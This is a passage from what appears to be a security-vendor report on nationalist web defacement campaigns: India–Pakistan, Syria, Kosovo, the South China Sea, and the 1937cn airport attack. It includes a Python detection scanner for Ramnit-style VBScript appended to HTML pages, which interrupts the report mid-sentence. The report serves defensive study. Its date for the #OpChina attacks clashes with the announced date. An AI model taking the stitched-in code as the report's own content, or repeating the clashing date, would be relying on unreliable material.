The messages of ZHC and the Muslim Liberation Army have a Pakistani slant and do not necessarily reflect the sentiments of the Kashmiri people. However, they may gain traction with younger Kashmiris, as ZHC and Muslim Liberation Army also highlight the human rights abuses and disappearances of Kashmiri activists and militants,[14] an issue that has not received international attention.

Nationalism Inspires Retaliatory Hacking

It is also quite common for hacking groups in India, Pakistan, and Bangladesh to start defacement campaigns against their rival country's websites. The presence of active hacking groups in neighboring, conflicting countries makes for a volatile situation, and these "turf wars" or "nationalistic defacements" can easily be triggered and, in a lot of cases, get out of hand.

One such incident happened in 2015 when a Pakistani hacker named Faisal 1337 hacked into multiple Indian websites. The government website of the state of Kerala was the most prominent website defaced.

Figure 25. Indian local government websites hacked

Immediately, hacking groups from India launched #op_pak_cyber_space, defacing hundreds of Pakistani websites in retaliation.

Figure 26. Retaliatory attack from Indian hackers

The defacement of the Mumbai Airport Customs website by Pakistani defacer Alone Injector is another example. After the incident, Indian hackers retaliated with a campaign defacing the websites for the Islamabad, Peshawar, Multan and Karachi airports in Pakistan.

Figure 27. Mumbai Airport Customs defacement

Figure 28. The defacement page seen on Islamabad, Peshawar, Multan and Karachi airport websites

Fallout of the Attacks between India and its Neighbors

Aside from ongoing campaigns by Indian, Pakistani and Bangladeshi hackers (against or in response to each other's hacking), the real-world conflict between the three countries has significantly increased in the past two years. One event happened on January 2, 2016, when several terrorists attacked India's Pathankot Air Force base, killing several Indian military men and one civilian. The attack was later claimed by and attributed to Jaish-e-Mohammed, a separatist group in Kashmir.[15] After the attack, Indian hacking groups retaliated by targeting Pakistani websites.

Figure 29. Retaliatory defacements made by Team Indian Black Hats aka Indian Cyber Devils

On September 18, 2016, attackers from Jaish-e-Mohammed, the same terror group responsible for the Pathankot Air Base attack a few months prior, launched another attack on an Indian army headquarters in Uri that left 17 army members dead, as well as all four attackers.[16] A few days later, the Indian government launched surgical strikes targeting locations in Kashmir.
This series of incidents sparked back-and-forth campaigns between Indian and Pakistani hacking groups, with defacements containing politically charged messages, freedom slogans, or just plain hate speech.

Figure 30. Defacements generated by conflict with India

Another event that triggered a sizeable defacement campaign was the drafting of Nepal’s new constitution in September 2015. Some in India believed that the constitution marginalized certain ethnic groups, an issue that was highlighted when the Indian Express reported that India had requested Nepal to make seven amendments to its constitution.[17] The report triggered outrage in Nepal, as the message was seen as a foreign country meddling in the internal affairs of an independent sovereign state. The outrage triggered the #BackOffIndia campaign during October 2015, supported by DQN hacker and craXerbikash from Nepal, BloodSecurity from the Philippines, and several Pakistani hackers.

Figure 31. A campaign triggered by India’s involvement with Nepalese matters

Groups behind the Attacks

The most prominent anti-India defacements came from RiseOfTheTigers, a collective that was created just for the #OpIndia campaign in March 2015. Several Bangladeshi hacking groups joined RiseOfTheTigers: Bangladesh Grey Hat Hackers, Bangladesh Cyber Army, Team_CC, Bangladesh Script Kiddie Hackers, Blacksmith Hackers Team, 3xp1re Cyber Army, Bangladesh Black Hat Hackers, and others.

Figure 32. Top 15 participating hacking groups and hackers: RiseOfTheTigers, Mr Anonymous, Red Lizard, Zero Cool, Mr.Sh4hz3b-HaXoR, rootheater, Xl33tX_Sn4p3R, Zain Haxor, pk_Robot, dulava!, MrAhSan HaXor, Mr Anon, Criminal.BD, Ghost_Root, Mr. Bangladesh

Military Actions prompt a #SaveSyria Campaign

On April 22, 2016, the Syrian government launched airstrikes targeting residential areas in Aleppo during scheduled Friday prayers. The attacks happened despite a ceasefire agreement by both sides in February 2016. There were several more airstrikes, the worst of which hit the al-Quds hospital, killing 50 people.[18] The incident inspired a #SaveSyria campaign that exposed graphic images of wounded civilians in Aleppo.

Figure 33. Targeted domains of #SaveSyria (chart titled "Target TLDs of #SaveSyria": defacement counts per TLD, 0 to 1,500; TLDs shown, in descending order: ru, com, de, it, net, org, fr, gr, nl, com.br, co.uk, kz, by, ch, com.ua, pl, fi, eu, be, info)

Most of the #SaveSyria defacements targeted Russian websites because many suspected that Russia was behind the April 2016 airstrikes. Russia is seen as supportive of Syrian president Bashar al-Assad, and the country has reinforced Assad's regime through air superiority assets.

Figure 34. Defaced sites showing graphic images of Aleppo

The Fallaga Team formed a loose collective called the Tunisian Cyber Resistance Al Fallaga Team, composed of Tunisian hackers and actively supported by hackers from Anonymous Arabe, Algeria, and Indonesia. They launched a defacement campaign with the hashtags #StopTheHolocaust, #AleppoIsBurning, #SaveAleppo and #SaveSyria.

Campaigns Provoked by Kosovo Disputes

Kosovo is a disputed territory and partially recognized state that declared its independence from Serbia in 2008. The majority of its population is of Albanian descent, and the country enjoys friendly relations with Albania stemming from common history and traditions. In Northern Kosovo, near Serbia, there are communities of Serbian descent that refuse to acknowledge Kosovo's independence.
This tension reached a boiling point in 2011 when Kosovo Police clashed with ethnic Serbian rioters who refused to remove roadblocks going into enclaves of Serbian control.[19] Albanian hacking groups KSG-CREW, kwgdeface and AlbanianHackers launched the #AntiSerbs campaign a few months after the initial clashes. The campaign died down before the Brussels Agreement, which involved the integration of Northern Kosovo into Kosovo and had Kosovo Serbs manning the police and judiciary, was concluded.

Figure 35. Timeline of anti-Serbs campaign (chart: monthly defacement counts, 0 to 400, from 10/31/2011 to 3/31/2014)

The defacement pages showed support for Kosovo independence, and also mentioned contested towns commonly involved in civil unrest. They listed Serbian-controlled territories bordering Kosovo with an Albanian majority and declared their desire to separate from Serbia and join Kosovo.

Figure 36. Web defacement pages supporting Kosovo

Disputes in the South China Sea

OpPhilippines and OpTaiwan

On May 9, 2013, a maritime incident involving the Taiwanese fishing boat Guang Da Xing No. 28 and the Philippine Coast Guard resulted in the death of Taiwanese fisherman Hung Shih-cheng (洪石成).[20] This incident led to many consequences, including sanctions and a military drill from the Taiwan government, protests in Taiwan, and several cyberattacks. On May 10, 2013, people in Taiwan called for DDoS attacks against .gov.ph to force the Philippine government into issuing an official apology. Many hackers responded, attacking more than 30 .gov.ph sites.[21]

Figure 37. Forum post mobilizing visitors to launch DDoS attack

On May 11, Filipino hacker "Pinoy Vendetta"[22] sent a warning message to Taiwanese hackers by defacing one Taiwan government site and several commercial sites. In response, AnonTaiwan launched #OpPhilippines the next day.

Figure 38. Web defacement page from "PinoyVendetta"

After the attack, AnonTaiwan posted leaked data from .gov.ph sites on Pastebin. One noteworthy victim was dns.gov.ph, which is the .gov.ph domain registry website. More than 2,300 accounts, which were possibly admin accounts for .gov.ph domains, were leaked. These government sites faced a huge risk: attackers could potentially have changed the name servers of the domain names, government domain names would then have resolved to invalid IP addresses, and important sites would have been inaccessible to the public.

Figure 39. Information leaked on Pastebin

On May 25, 2013, Filipino hackers attacked 31 .tw sites in a campaign titled #OpTaiwan as a response to #OpPhilippines. The defaced pages displayed the messages "Stop attacking our cyberspace" and "Let our government handle this problem."

Figure 40. Web defacement pages for #OpTaiwan

Defacements over Territory

Six countries—China, Taiwan, Philippines, Vietnam, Malaysia, and Brunei—are contesting several islands and features, rock outcrops, sandbars, and reefs in the South China Sea. Over the last few years, the tension between China and Vietnam, and between China and the Philippines, has increased. China has taken aggressive action, from coast guard patrols to building facilities and installations in various contested areas. This has sparked defacement activities by several groups from the Philippines, Vietnam, and China against their rival countries' websites.
Figure 41. Top defacers participating in South China Sea defacements, and the groups they belong to

Attacker | Team
越南国宰相 | 1937cn
oaddah | 1937cn
ZeSn | Anonymous Philippines
YoCo Smart | Silic Group
Nama Defacer | Anonymous Philippines
AnonReaper | Anonymous Philippines
BloodSecurity | BloodSecurity
HukbalaHack | Anonymous Philippines
Anonymous Philippines | Anonymous Philippines
AlfabetoVirtual | 1937cn

Early Attacks in 2011

Chinese marine surveillance vessels cut the cables of Vietnamese oil survey vessels in the South China Sea.[23] This incident triggered defacement attacks that started on June 3, 2011. A Vietnamese defacer, 'Mr.N - Cubi11', attacked Chinese government websites. The page displayed Vietnamese patriotic slogans like "Vietnamese People is Willing to Sacrifice to Protect the Sea, Sky, and Nation." More Vietnamese defacers joined this campaign afterwards.[24]

Figure 42. Vietnamese defacer page

From June 4, 2011, Chinese defacers started to retaliate by attacking .vn websites. Hongke Union (HUC), a well-known Chinese hacktivist group, mobilized its members and launched a series of attacks. Over 30 .gov.vn sites were defaced.

Figure 43. Chinese defacers retaliate

After completing the attacks, the HUC sent out a summary reporting that their attacks ran from June 4 to June 5, that two function groups were created (one for DDoS, one for defacement), and that several QQ chat groups and YY chat channels were created to coordinate attacks.[25] Some non-HUC hackers also joined the attack, compromising over 1,000 sites. Most of the victims suffered DDoS attacks and defacement. One popular Vietnamese search engine site was inaccessible for five hours. During the attacks, HUC found Vietnamese defacers attacking .cn sites. The Chinese hacker group Silic also joined the retaliation.

In their deface pages, Silic claimed that "(Vietnamese defacers) first stir up trouble, we just attack back." This group attacked 98 .vn websites on June 8. Most victims were .gov.vn sites.[26]

Figure 44. Silic Group defacement page

OpChinaDown, 2012

On April 10, 2012, a standoff between the Philippine Navy and Chinese maritime surveillance ships over the disputed Scarborough Shoal (Huangyan in Chinese) in the South China Sea caused tension between the two countries. In response, Chinese defacers compromised the website of the University of the Philippines on April 20, 2012, leaving a message that claimed, “We come from China! Huangyan Island is Ours”.

Figure 45. Defaced page of University of the Philippines

The defacer group "Anonymous #OccupyPhilippines" responded on the same day, compromising several .cn sites. The statement "Scarborough Shoal is ours!" was prominent on the deface page.[27] Three days later, on April 23, the government of the Philippines claimed that two of its sites suffered DDoS attacks coming from Chinese IP addresses—an apparent retaliatory attack from China. Defacements escalated quickly, triggered by the DDoS attacks.[28]

Figure 46. Page from #OccupyPhilippines

On the same day, OccupyPhilippines and PrivateX launched a joint attack operation, "#OpChinaDown". They attacked .gov.cn sites and posted DB schemas and login credentials of victim sites on Pastebin. On April 25, the Silic group (the same organization that attacked .vn sites in 2011) joined the web defacement campaign and targeted .gov.ph sites. Besides derogatory statements against Philippine defacers, the page allowed visitors to leave messages on it.
Over the course of 3 hours, over 30 visitors left messages on the defaced pages.[29]

Figure 47. Silic defacement page, where visitors can leave messages

The Chinese hacktivism group 1937cn joined the defacement war on June 1, 2012. This group created a very long deface page to convince viewers to believe in their message. 1937cn spread that page across 173 sites in five days.

StopReclamation and OpChina, 2015

China started reclamation and building on the Spratly archipelago of the South China Sea in April 2015.[30] This action caused a wave of defacement attacks. BloodSec, a Philippine defacer group, launched a #StopReclamation campaign on April 26, 2015.

Figure 48. BloodSec defacement page

Tensions escalated a month later. Posting on Pastebin,[31] defacers from the Philippines and Vietnam declared the beginning of an #OpChina campaign on May 28, 2015. In the announcement, they called themselves "the united hackers from the Philippines and Vietnam," aiming to "protest your (China) unjust actions over the South China Sea". At the end of the announcement, they left a note that read "Expect us! 5/30/2015".

Figure 49. Joint message from Vietnamese and Filipino hackers, and their defacement pages

This is the first time defacers from the two South East Asian countries united for a common political cause. A series of attacks hit .cn sites on the date stated in their warning message—August 30, 2015. Most of the victims were .gov.cn sites. The message left by the group Anonymous Philippines asked the Chinese government to "stop the reclamation, do not put or establish any structure in that location." At the same time, "AnonGhost" from Vietnam put out the message, "Stop the infringements of sovereignty island."

Figure 50. Retaliation from Chinese hackers

On the same day, the Chinese defacer team "1937cn" retaliated by defacing .vn sites, and blamed it on the joint action of defacers from the Philippines and Vietnam. 1937cn also claimed that "South China Sea is China's inherent territory." 1937cn's response was very quick—they likely noted the joint announcement of the defacers from the Philippines and Vietnam, and carefully prepared the retaliation.

Attacks on Vietnamese Airports, 2016

On July 12, 2016, the Hague Permanent Court of Arbitration ruled in favor of the Philippines against China in an arbitration case about the disputes in the South China Sea. The ruling triggered a series of cyberattacks against Vietnam.[32] On July 29, 2016, the Chinese hacker group 1937cn attacked two major airports in Vietnam and the website of Vietnam Airlines.[33] They defaced the home page with the same page used in 2015 during the #OpChina defacement campaign. Then the hacker group leaked client information of Vietnam Airlines.[34] This was not the first time 1937cn attacked Vietnam Airlines; the group also launched a similar attack on May 30, 2015.

Figure 51. Client information from Vietnam Airlines

The Civil Aviation Administration of Vietnam reported several attacks, supposedly from the 1937cn team, on two Vietnam airports within the same day. The IT system for Vietnam Airlines check-ins at Tan Son Nhat International Airport was attacked and stopped working. The deface page, which was the same page used on the Vietnam Airlines website, replaced the flight information screens at Noi Bai International Airport. The speaker system at Noi Bai airport was also compromised by the hackers for a few minutes, during which the speakers broadcast an announcement about the territorial dispute.
According to the Civil Aviation Administration of Vietnam, the attack caused the delay of 100 flights, affecting thousands of passengers.[35] This incident might hint at future hacktivism trends: to reach a wider audience, hacktivists could potentially broaden their targets from traditional websites to critical infrastructure such as airports.

Hacking Groups’ Connections and Campaigns

Deface groups are formed by a loose affiliation between hackers. They can be defined as "loose" since hackers can be affiliated with one or more of these hacking groups, even across territories.

Figure 52. The hacking group AnonCoders (diagram nodes: AnonCoders, gunz_berry, Virus Noir, darkshadow-tn, Albania Attacker, dr.t3rror, Indonesian Code Party, Moroccan Ethical Hackers, Fallaga Team, Myanmar Noob Hackers, Anonymous Albania, Arab Warriors Team, Anonghosts)

As an example, see the group AnonCoders, which lists gunz_berry, Virus Noir, darkshadow-tn, Albania Attacker and dr.t3rr0r as its core members. However, gunz_berry is also affiliated with Indonesian Code Party, while Virus Noir is affiliated with Moroccan Ethical Hackers, darkshadow-tn with Fallaga Team, and dr.t3rr0r with Myanmar Noob Hackers. Albania Attacker is affiliated with three other groups—Anonymous Albania, Arab Warriors Team, and Anonghosts. AnonCoders shows how hackers can also be members of various groups, and how hackers from different countries can form a group.

Other examples showing the fluidity of group membership are Pakistan's two biggest hacking groups: ZCompany Hacking Crew and Muslim Liberation Army. Both have fairly large teams; ZCompany Hacking Crew has at least 30 members, and Muslim Liberation Army has around 26. Below you can see seven hackers who are members of both groups simultaneously, as we've seen defacements made by both teams acknowledging these hackers in their defacement pages within the same time frame.
50 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks ZCompany Hacking Crew Toshiro Sniper MongoOse Don Milan Milo Nabeel XtreMiSt HawkPak Jaguars Angel De Decorum Unknown Tazii Hothead Chf Code HardHunter RoCk Silent Hell Bozz error Zolo Zarrar Velocity Madni Zulfi Dropper Gen Hard Hunter Zology Xaha Unknown Hax TriCk aka Saywhat?MasterMind Muslim Liberation Army Papaas Dorian Gray Radical Assassin Metallic Xenon Syed Zadaa (Mindy) PCCS PCF Bozz Hacker Ibrar Buttz Killer Mind Silence Destiny Cobra Black KillerMind Haxor Faisy Ali LaghariJerry Hassan HyP3r-Boy fAchO Nabeel (Master Mind) Zarb-E-Momin Figure 53. Members of the ZCompany Hacking Crew and the Muslim Liberation Army Collectives Hacking groups can also band together to form bigger groups or collectives. The well-known group Anonymous is a model for this. They can rightly be considered the biggest hacking collective in the world based on the numerous hacking groups who identify and associate themselves with the name \xe2\x80\x9cAnonymous\xe2\x80\x9d. On a smaller scale, a collective can be formed simply to support a campaign. Take, for example, the defacements done by Bangladeshi hackers against Indian websites, triggered by the Cricket World Cup. The collective Rise of the Tigers was borne out of various Bangladeshi hacking groups working together: 3xp1r3 Cyber Army, Blacksmith Hacker's Team, Cyb3r Command0S, Bangladesh Grey Hat Hackers, Bangladesh Black HAT Hackers, Cyber Sword and Bangladesh Script Kidde Hackers. 51 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Campaign Recruitment and Tools Certain individuals or groups loosely organize hacktivism campaigns. They set time frames for a particular campaign, and even use social media to coordinate and launch these campaigns. Figure 54. Facebook calendar used to schedule defacement activities Figure 55. 
Social media post used to spread templates for defacement scripts 52 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks They use calendar event features like Facebook Events to organize campaigns. They also advertise campaigns on their team pages and actively recruit other hackers and hacking groups to participate. Tools, targets, and defacement page templates are also shared openly by those participating in a campaign. Figure 56. Tools spread through social media and sharing sites 53 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Certain groups also set up team websites to host content, post announcements, and facilitate discussions through forums. These commonly have sections for tutorials, tools, and kits. Figure 57. Different community sites hosting forums, downloads, news and more 54 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Auxiliary Activities of Defacement Groups Besides tools and defacement templates, these groups also share attack techniques. For example, groups post hacking tutorials on GitHub and upload tutorial videos to streaming sites. Figure 58. Tools and tutorials for different hacking activities shared by defacers 55 | A Deep Dive into Defacement: How Geopolitical Events Trigger Web Attacks Defacers are also contributing to Exploit-DB, which is is an open-source database for sharing exploit codes and security papers. To find the number of defacers that are also active on Exploit-DB, we compared our list of known defacers against this list of authors36 from Exploit-DB: \xe2\x80\xa2 Total defacer/hacker alias that are also listed as Exploit-DB authors: 790 of 7,858 (10.05%) \xe2\x80\xa2 PoC submitted by possible defacers: 6,380 of 36,576 (17.44%) InjEctOr5 CoBRa_21 bd0rk EgiX Mr.SQL HACKERS PAL JosS AtT4CKxT3rR0r1ST t0pP8uZz CWH Underground Hussin X cr4wl3r ajann ZoRLu indoushka 63 64 65 67 68 69 74 96 105 115 121 130 204 221 294 Figure 59. 
Top 15 defacers who shared exploit codes

Figure 60. Breakdown of exploit types submitted by possible defacers: Web Apps 83.53%, Remote 5.72%, DOS 5.63%, Local 4.26%, Shellcode 0.86%

Escalating into Real-World Terrorism Activities

Hackers who participate in defacement and other forms of hacking can also segue into more serious crimes, possibly driven by real-world disputes and political agendas. An example would be the case of Team P0ison's founder Junaid Hussain (TriCk), who started notable defacements in 2010.

Figure 61. Sample of defaced pages done by TriCk supporting Free Kashmir

Hussain was arrested in 2014 for hacking into Katie Kay's (special advisor to British Prime Minister Tony Blair) email account and leaking PM Blair's personal information37. After six months in jail, Junaid Hussain traveled to Syria and joined ISIS. He took the name Abu Hussain al-Britani, and is believed to be the person behind the hack of U.S. Central Command's Twitter and YouTube accounts. He is also believed to have been killed in a US air strike in Syria in 201538.

Defaced Sites as Unwitting Infection Sources

Aside from actively committing criminal activities, defacement pages can be unwitting carriers of malware code. In the course of our research, we saw the malware Ramnit distributed through malicious websites or packaged as fake software installers. Ramnit is an actively developed malware family whose main goal is to steal banking credentials. It has also evolved to include worm propagation capabilities, as well as the ability to infect files, including HTML files. Ramnit does this by appending VBScript code to the end of HTML files found on the affected machine. The infected HTML file contains code to install a copy of the Ramnit malware. Unfortunately, some defacers’ machines were infected by Ramnit and had their web defacement templates infected to include the malicious VBScript.
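The file-infection pattern just described (a VBScript block appended after the end of an otherwise ordinary HTML page) is something a site owner or template author can check for before publishing. The scanner below is an added example, not code from the Trend Micro report; the sample pages are constructed, and the heuristics (script content after the last </html>, or any VBScript tag at all) are assumptions about what a trustworthy page should never contain, not a signature for any real Ramnit payload.

```python
"""Scan HTML files for script blocks appended after the closing </html> tag.

Added example, not from the Trend Micro report. It models the infection
pattern the report describes (VBScript appended to the end of HTML files)
with constructed sample pages; it does not contain or detect any real
Ramnit payload bytes.
"""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional, Tuple

HTML_CLOSE = re.compile(r"</html\s*>", re.IGNORECASE)
# Opening <script> tag whose language/type attribute names VBScript.
VBS_SCRIPT_TAG = re.compile(
    r"<script[^>]*\b(?:language|type)\s*=\s*['\"]?(?:text/)?vbscript['\"]?[^>]*>",
    re.IGNORECASE,
)
ANY_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    reason: str
    offset: int  # character offset where the suspicious region starts


def trailing_content(html: str) -> Optional[Tuple[int, str]]:
    """Return (offset, text) for non-whitespace content after the last </html>."""
    matches = list(HTML_CLOSE.finditer(html))
    if not matches:
        return None
    end = matches[-1].end()
    tail = html[end:]
    return (end, tail) if tail.strip() else None


def scan_html(html: str, path: str = "<memory>") -> List[Finding]:
    """Return findings for a single page. An empty list means nothing suspicious."""
    findings: List[Finding] = []
    tail = trailing_content(html)
    if tail is not None:
        offset, text = tail
        if VBS_SCRIPT_TAG.search(text):
            findings.append(Finding(path, "vbscript block appended after </html>", offset))
        elif ANY_SCRIPT_TAG.search(text):
            findings.append(Finding(path, "script block appended after </html>", offset))
    # VBScript anywhere in a page is unusual enough to review even inside <html>.
    for m in VBS_SCRIPT_TAG.finditer(html):
        if tail is None or m.start() < tail[0]:
            findings.append(Finding(path, "vbscript block inside document", m.start()))
    return findings


def strip_trailing_injection(html: str) -> str:
    """Return the page cut at the last </html> when a script block follows it.

    Keep the original file for forensics before overwriting anything: the
    appended block is evidence that the machine the template came from was
    infected, and that machine needs cleaning or the page will be re-infected.
    """
    tail = trailing_content(html)
    if tail is None or not ANY_SCRIPT_TAG.search(tail[1]):
        return html
    return html[: tail[0]]


def scan_tree(root: str) -> List[Finding]:
    """Scan every .htm/.html file under root (e.g. a web root or template folder)."""
    findings: List[Finding] = []
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in {".htm", ".html"} and p.is_file():
            findings.extend(scan_html(p.read_text(errors="replace"), str(p)))
    return findings


# Constructed sample pages (not real defacement templates or malware).
CLEAN_PAGE = (
    "<html><head><title>constructed defacement template</title></head>"
    "<body><h1>hacked by nobody</h1></body></html>"
)
INFECTED_PAGE = CLEAN_PAGE + (
    "\n<SCRIPT Language=VBScript><!--\n"
    "' placeholder standing in for the appended dropper script\n"
    "--></SCRIPT>"
)

if __name__ == "__main__":
    for page in (CLEAN_PAGE, INFECTED_PAGE):
        print(scan_html(page) or "clean")
```

Running scan_tree over a template directory before each upload turns an unknowing distributor into a detected one; the finding offset points at the appended region so it can be reviewed without executing it.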
This, in turn, made their defacement pages unwitting distributors of the Ramnit malware.

Based on our records, 9,726 defacements were seen to include the Ramnit VBScript. Below are the top 30 defacers who were infected by Ramnit and had their compromised web defacement pages distribute the malware. Most of the defacers were either from Arabic-speaking countries in the Middle East and North Africa or from China. In a serendipitous turn of events, the top defacer that unwittingly spread Ramnit goes by the nickname "stupid".

Figure 62. Defacers who were unknowingly spreading Ramnit through their defacement pages

Conclusion

As seen in the examples above, real-world conflict can trigger web defacement on a large scale. One event can lead to a campaign that brings hacking groups together, and large collectives can sustain defacement campaigns for long periods of time. Most are politically or religiously motivated, and attackers are typically keen to express fervent patriotism over specific causes. While these web defacement activities seem relatively benign, it is plausible for defacers to move on to other hacking activities and criminal behavior.
Web Defacements and IoT

Web defacements are going to continue in the foreseeable future, and may even become more prevalent as more Internet of Things (IoT) devices are connected online.

Figure 63. Router control panel replaced with a hacker’s page

The above screenshot shows a defaced router control panel, with the title of the HTML page changed to "You hacked from iraq(fb\arakan". A lot of people may not realize that IoT devices run stripped-down web servers that host their control panels and management consoles. The setup is something that would be relatively easy for a defacer to exploit and compromise. In the case of the router defacement above, the attacker might not even have known that he had defaced a non-traditional/IoT website. Exploits for vulnerabilities in common web applications or server components are also applicable and effective on non-traditional/IoT websites. It would be simple for a defacer to transition into compromising connected IoT devices. With the growing number of IoT devices, it might be appealing for defacers to continue down that route.

Hacktivism in the Future

There are various vulnerabilities that attackers exploit to deface websites to push their specific agenda. But despite compromising web sites that contain potentially sensitive data (PII, account credentials, transaction histories, etc.), most defacers have yet to abuse their access further. They are seemingly content just to deface the site. However, the delineation between pure web defacement and cybercriminal or cyberespionage activity is disappearing. Hackers are now increasingly involved in developing web shells (backdoors to maintain access to compromised web servers), and also delving into doxing and leaking stolen data. After defacing websites, the next step would seem to be capitalizing on the available information on compromised sites.
Apart from individuals, defacement groups have yet to monetize their activities. According to our data, 99.9% of web defacement pages are harmless. Pages found containing malicious code are mostly infected by VBS_RAMNIT.SMC. These pages were unknowingly infected, not intentionally put online to spread malicious code: the defacers had their templates infected by the malware and unwittingly spread Ramnit.

A troubling scenario is if these defacement groups decide to monetize their successful hacks by, for example, installing malicious redirections or exploit code in the defacement pages that would then install ransomware. As previously mentioned, so far these defacements have been benign and motivated by real-world conflicts or political agendas. However, cybercriminals could easily use such hacks for profit-driven criminal activities. We have already seen some instances of this. There were reports of Indian hackers targeting Pakistani servers and users to install ransomware for "patriotic" purposes39. If this continues and escalates, then the line between defacers, hacktivists, and cybercriminals will become even more blurred.

How can enterprises protect their sites?

Based on the major vulnerabilities used by defacers, there are simple steps that can secure servers against these threats. If practiced and deployed consistently, these tips can help enterprises maintain long-term security:

• Ensure that basic security policies are employed and maintained long-term: strong passwords, proper administration security policies, and correct configuration.
• Use web application firewalls to filter, monitor, and block malicious traffic. Security is necessary at the web application level.
• Practice secure coding. Organizations must implement secure coding standards on all their sites.
• Regularly use testing tools to ensure deployed code is secure.
• Make patching systems and networks a part of standard policy. This prevents cybercriminals from exploiting vulnerabilities in unpatched/outdated software.
• Regularly scan web applications for vulnerabilities: organizations need to check their web apps for vulnerabilities such as those that lead to SQL injection and cross-site scripting attacks.
• Use multi-layered protection that secures vulnerable websites from the common attacks used by defacers. Solutions like Trend Micro™ Deep Security™ and Vulnerability Protection provide virtual patching that protects servers and endpoints from threats that may abuse vulnerabilities.

References

1. Zone-H archives. (n.d.). Zone-H Unrestricted Information. Last accessed on 11 November 2017 at http://www.zone-h.org/.
2. Ibid.
3. Hack CN. (n.d.). "Global Hacked Site Statistics | Hacker Technique Detection | Hacker Intrusion Attacks" (全球被黑站点统计|黑客技术检测|黑客入侵攻击). Last accessed on 17 November 2017 at http://www.hack-cn.com/.
4. http://www.mirror-zone.org (offline).
5. H4ck Mirror. (n.d.). Hack Mirror. Last accessed on 16 November 2017 at http://www.hack-mirror.com/.
6. http://www.mydeface.com (offline).
7. BBC Newsround. (20 February 2015). BBC Newsround. "Guide: Why are Israel and the Palestinians fighting over Gaza?" Last accessed on 16 November 2017 at http://www.bbc.co.uk/newsround/20436092.
8. Al-Islam. (n.d.). Al-Islam.org. "The Battle of Badr". Last accessed on 14 November 2017 at https://www.al-islam.org/articles/battle-badr.
9. Yifa Yaakov. (5 August 2014). The Times of Israel. "After 29 days, Operation Protective Edge by the numbers". Last accessed on 17 November 2017 at https://www.timesofisrael.com/after-29-days-operation-protective-edge-by-the-numbers/.
10. ABC. (8 January 2015). ABC News. "Charlie Hebdo shooting: 12 people killed, 11 injured, in attack on Paris offices of satirical newspaper". Last accessed on 14 November 2017 at http://www.abc.net.au/news/2015-01-07/charlie-hebdo-satirical-newspaper-shooting-paris-12-killed/6005524.
11. AFP/Reuters. (16 July 2017). Deutsche Welle. "'Cyber Army' hacker arrested, says Bulgaria". Last accessed on 17 November 2017 at http://www.dw.com/en/cyber-army-hacker-arrested-says-bulgaria/a-18586433.
12. Rifat Fareed. (27 October 2017). Al Jazeera. "'Black day' in Kashmir marks 1947 Indian army arrival". Last accessed on 17 November 2017 at http://www.aljazeera.com/news/2017/10/day-kashmir-marks-1947-indian-army-arrival-171027122649223.html.
13. Maps of India. (n.d.). Maps of India. "26th October 1947: Maharaja Hari Singh agrees to the accession of Jammu and Kashmir to India". Last accessed on 16 November 2017 at https://www.mapsofindia.com/on-this-day/26th-october-1947-maharaja-hari-singh-agrees-to-the-accession-of-jammu-and-kashmir-to-india.
14. Aijaz Hussain. (10 December 2013). The San Diego Union Tribune. "Activists, families protest Kashmir disappearances". Last accessed on 13 November 2017 at http://www.sandiegouniontribune.com/sdut-activists-families-protest-kashmir-disappearances-2013dec10-story.html.
15. Rupam Jain. (19 December 2016). Reuters. "India indicts Pakistan-based militants over Pathankot air base attack". Last accessed on 17 November 2017 at http://in.reuters.com/article/india-pakistan-attack/india-indicts-pakistan-based-militants-over-pathankot-air-base-attack-idINKBN1480QO.
16. Hari Kumar and Geeta Anand. (18 September 2016). The New York Times. "17 Indian Soldiers Killed by Militants in Kashmir". Last accessed on 17 November 2017 at https://www.nytimes.com/2016/09/19/world/asia/17-indian-soldiers-killed-by-militants-in-kashmir.html.
17. Shubhajit Roy. (24 September 2015). The Indian Express. "Make seven changes to your Constitution: India tells Nepal". Last accessed on 2 November 2017 at http://indianexpress.com/article/world/neighbours/make-seven-changes-to-your-constitution-address-madhesi-concerns-india-to-nepal/.
18. Medecins Sans Frontieres. (26 April 2016). MSF.org. "Syria: Update on airstrike at Al Quds hospital". Last accessed on 17 November 2017 at http://www.msf.org/en/article/syria-update-airstrike-al-quds-hospital.
19. Die Morina. (2 March 2017). Balkan Transitional Justice. "Mitrovica’s Flashpoint Bridge Symbolises Kosovo’s Divisions". Last accessed on 17 November 2017 at http://www.balkaninsight.com/en/article/mitrovica-s-flashpoint-bridge-symbolises-kosovo-s-divisions-03-01-2017.
20. Tarra Quismundo. (16 April 2016). Inquirer. "PCG men ordered to pay Taiwan family". Last accessed on 17 November 2017 at http://globalnation.inquirer.net/138653/pcg-men-ordered-to-pay-taiwan-family.
21. Sofia Wu. (13 May 2013). Focus Taiwan. "Shooting ignites Taiwan-Philippines cyber war". Last accessed on 16 November 2017 at http://focustaiwan.tw/news/atod/201305130041.aspx.
22. Clifford Trigo. (11 May 2013). Pinoy Hack News. "Pinoy Vendetta sends warning message to Taiwan, defaces 5 websites". Last accessed on 17 November 2017 at https://www.pinoyhacknews.com/pinoy-vendetta-sends-warning-message-to-taiwan-defaces-5-websites.
23. Petro Vietnam. (1 June 2011). PetroVietnam. "Chinese ships destroy Vietnam sea cable". Last accessed on 17 November 2017 at https://www.youtube.com/watch?v=w1H6zcuXjJ8.
24. ChinaAZ. (8 June 2011). Cheng Cold Blog. "Many websites in the South China Sea were attacked by Vietnamese hackers and Chinese hijackers counterattacked". Last accessed on 17 November 2017 at http://www.bj3gweb.com/Link201106_WebAttack_ChinaAndVietnam.html.
25. Ibid.
26. Kafan. (5 June 2011). Kafan.cn. "Many domestic websites were attacked by Vietnamese hackers". Last accessed on 16 November 2017 at http://bbs.kafan.cn/thread-999960-1-1.html.
27. Xiao Bian. (6 May 2012). Freebuf. "My Filipino Maid is a Hackers - China and the Philippines network war". Last accessed on 16 November 2017 at http://www.freebuf.com/news/913.html.
